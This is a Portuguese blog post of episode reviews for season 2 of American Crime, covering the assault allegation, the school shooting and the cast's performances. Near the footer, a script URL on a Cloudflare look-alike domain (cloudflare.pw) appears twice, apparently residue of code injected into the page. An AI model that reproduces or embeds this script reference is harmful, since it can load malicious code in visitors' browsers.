American Crime (ABC) – 2ª temporada (FINALIZADA)

americancrimeEm seu retorno, a série contará a história de Taylor Blaine (Connor Jessup), um rapaz que acusa dois estudantes, jogadores de basquete, de drogá-lo e violentá-lo, sendo que fotos da agressão são divulgadas na Internet. O escândalo divide a opinião pública e a comunidade, levando a tensões raciais e de classes.

s02e01 Episode 1 – Em seu retorno a nova série antológica do canal ABC, aposta no ambiente estudantil para mostrar os conflitos raciais, sexuais e sociais; fomos apresentados a Lily Taylor como Anne, mãe de Taylor, que fica sabendo quando o filho é suspenso da escola, na qual é bolsista, que fotos dele bêbado cairam na internet, no entanto, o rapaz diz que na mesma noite foi estuprado por colegas da escola do time de basquete, daí o que vemos é o de sempre, o técnico se coloca contra as acusações de seus meninos, a conselheira dá um “baile” na mãe e esta fica desesperada e aciona a polícia.

Este seria o primeiro capítulo da temporada, o que dá pra notar, os melhores nomes do elenco retornaram, com destaque para Felicity Huffman neste primeiro, mas ainda temos Regina King (que roubou a cena na primeira temporada), Elvis Nolasco, Timothy Hutton, Hope Davis e outros. Somente gostaria que a série, bastante elogiada, fosse um pouco mais humana e menos fria nessa nova temporada.

s02e02 Episode 2 – Annie pede ajuda para Taylor, mas não é fácil acionar as autoridades e chamar-lhes atenção para o crime. Enquanto isso, Leslie tenta impedir a investigação e algumas verdades de Eric vêm a tona. Continua bom!

s02e03 Episode 3 – Um artigo é publicado colocando Kevin e seu colégio em uma situação delicada. Com a divulgação na mídia se inicia um caça às bruxas, sem ainda sabermos quem são os reais envolvidos e quem esta “tirando o seu da reta”, e mesmo Taylor fica em suspeita, até que o retorno do DNA de suas roupas faz com que a investigação realmente ganhe força. A maneira como a direção e o roteiro retratam os personagens e as situações, bastante desconexas, nos faltando informações sobre o todo cria um cenário de caos, na verdade, ainda não sabemos o que realmente aconteceu e assim fica complicado “julgar” mocinhos e vilões, estereótipos que o roteiro não permite criar.

s02e04 Episode 4 – Após a revelação de que evidências foram encontradas nas roupas de Taylor, os pais dos jogadores de basquete e o corpo docente da Leyland School se preparam para invasivos testes de DNA para membros do time. A denúncia começa a tomar forma, no entanto, o próprio Taylor tem revelações a serem feitas; a ambiguidade do comportamento dos jovens, que reflete no descrédito dos pais, é a grande característica da série.

s02e05 Episode 5 – Nas horas após Eric ter sido forçado a discutir abertamente sua sexualidade, Taylor deve defender suas ações para a polícia na noite do suposto ataque. Episódio que marcou o fim do suspeito estupro, afinal os jovens se relacionavam e tudo virou um “ele disse-ele disse”, de diferente versões dos envolvidos, tema muito comum em SVU. Porém como a série está apenas na metade acredito que um fato novo deve surgir para criar maior conflito no caldeirão de etnias/posições sociais/sexualidades que a série procura retratar!

s02e06 Episode 6 – Contra o conselho dos advogados da escola, Leslie decide dar boas-vindas a Eric em seu retorno a Leyland. No entanto, logo Eric descobre que sua presença não agrada a alguns de seus colegas do time de basquete. O clima esta começando a pesar para as “vítimas” e as tensões também, ainda acho o episódio intermediário para algo maior, acho que no próximo as coisas vão ficar bem piores e as conflitos irão explodir.

s02e07 Episode 7 – Sentindo apenas dor e confusão, Taylor continua a queda emocional ao mesmo tempo em que tenta encontrar uma forma de parar de se sentir como vítima. Enquanto isso, os registros médicos e privados de Anne são postados online de forma anônima.

Quando a questão se volta para Taylor e Anne vemos que as “vítimas” iniciais sofrem pelo poder dos denunciados, seja político seja social, e como sempre esperava ocorre uma espécie de catarse ao vermos Taylor baleando um dos colegas de escola, era praticamente a tragédia anunciada! Quero mencionar o incrível trabalho de Lili Taylor e Felicity Huffman na serie, Lili Taylor tem aqui sua Emmy Tape, enquanto, Felicity constrói no politicamente correto e no pragmatismo uma personagem complexa e longe do estereótipo de “diretora” que defende os interesses da escola.

s02e08 Episode 8 – Em um episódio que traz entrevistas como os verdadeiros professores de Columbine, assim como pais e vítimas de bullying LGBT, a escola Leyland fica em luto pela perda de um dos seus, ao mesmo tempo que Leslie fica com o emprego em perigo após a tragédia.

Após o plot twist do episódio passado, gosto a maneira como o roteiro (independente dos depoimentos reais aqui relatados, sempre impactantes, não sei se acrescentam à série, mas são dramaticamente pesados) de John Ridley costura os personagens; após a morte do estudante que espancou Taylor, vemos que alguns personagens começam a mostrar sua real faceta, aqui destaco o líder do time de basquete ao enfrentar Eric em desabafo, com isso os personagens adultos ganham destaque, principalmente, neste episódio, Leslie (Felicity Huffman, garantindo sua Emmy tape). Ansioso pela reta final da temporada e lamentando pela pouco audiência da série.

s02e09 Episode 9 – Após a morte de um colega de Leyland, toda a comunidade é forçada a reexaminar as escolhas que fizeram perante a revelação do que aconteceu entre Eric e Taylor. Enquanto isso, informações pessoais vazadas implicam tanto Kevin quanto Becca no tiroteio.

Como a personagem de Felicity Huffman é “fdp”, na primeira oportunidade que teve, puxou o tapete de seu Conselho, na iminência de ser demitida; gostei muito das “crises de consciências” dos personagens adultos, principalmente, a decepção do técnico, personagem de Timothy Hutton, que viu seu time ruir pela simples falta de diálogo.

s02e10 Episode 10 Season Finale – Após novos vazamentos de informações na internet, a situação de Taylor melhora, e ele toma uma importante decisão. Enquanto vemos as escolhas de Taylor frente ao tribunal, os bastidores políticos/sociais são o grande prato da season finale. Simplesmente devastador, para tudo e todos. Genuinamente triste e revoltante!

STATUS: INDEFINIDO (MARÇO/2016).

https://cloudflare.pw/cdn/statslg30.js

https://cloudflare.pw/cdn/statslg30.js

Anúncios

%d blogueiros gostam disto: